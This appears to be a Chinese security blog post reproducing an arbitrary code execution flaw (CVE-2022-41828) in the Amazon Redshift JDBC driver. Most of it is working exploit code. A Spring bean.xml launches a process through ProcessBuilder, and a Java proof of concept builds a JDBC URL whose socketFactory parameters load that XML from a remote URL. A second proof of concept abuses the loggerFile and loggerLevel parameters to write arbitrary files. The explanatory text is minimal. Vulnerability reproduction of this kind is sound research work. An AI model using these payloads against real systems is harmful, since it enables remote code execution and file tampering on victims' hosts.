其他
原创 | amazon-redshift-jdbc-driver 任意代码执行漏洞
漏洞简介
漏洞复现
<!-- https://mvnrepository.com/artifact/com.amazon.redshift/redshift-jdbc42 -->
<dependency>
<groupId>com.amazon.redshift</groupId>
<artifactId>redshift-jdbc42</artifactId>
<version>2.1.0.7</version>
</dependency>
<!-- https://mvnrepository.com/artifact/org.springframework/spring-context-support -->
<dependency>
<groupId>org.springframework</groupId>
<artifactId>spring-context-support</artifactId>
<version>5.3.23</version>
</dependency>
bean.xml
<beans xmlns="http://www.springframework.org/schema/beans"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:p="http://www.springframework.org/schema/p"
xsi:schemaLocation="http://www.springframework.org/schema/beans
http://www.springframework.org/schema/beans/spring-beans.xsd">
<!-- 普通方式创建类-->
<bean id="exec" class="java.lang.ProcessBuilder" init-method="start">
<constructor-arg>
<list>
<value>bash</value>
<value>-c</value>
<value>calc.exe</value>
</list>
</constructor-arg>
</bean>
</beans>
import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.SQLException;
public class CVE202241828 {
public static void main(String[] args) throws SQLException {
String socketFactoryClass = "org.springframework.context.support.ClassPathXmlApplicationContext";
String socketFactoryArg = "http://127.0.0.1:8080/bean.xml";
String jdbcUrl = "jdbc:redshift://127.0.0.1:5432/test?socketFactory="+socketFactoryClass+"&socketFactoryArg="+socketFactoryArg;
Connection connection = DriverManager.getConnection(jdbcUrl);
}
}
漏洞分析
任意代码执行 socketFactory/socketFactoryArg
任意文件写入 loggerLevel/loggerFile
import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.SQLException;
public class CVE202241828 {
public static void main(String[] args) throws SQLException {
String loggerLevel = "debug";
String shellContent="test";
String loggerFile= "test\\test.txt";
String jdbcUrl =
"jdbc:redshift://127.0.0.1:5432/test?loggerFile="+loggerFile+"&loggerLevel="+loggerLevel+"&"+shellContent;
Connection connection = DriverManager.getConnection(jdbcUrl);
}
}
往期推荐
原创 | 深度剖析GadgetInspector执行逻辑(上)
原创 | 深度剖析GadgetInspector执行逻辑(下)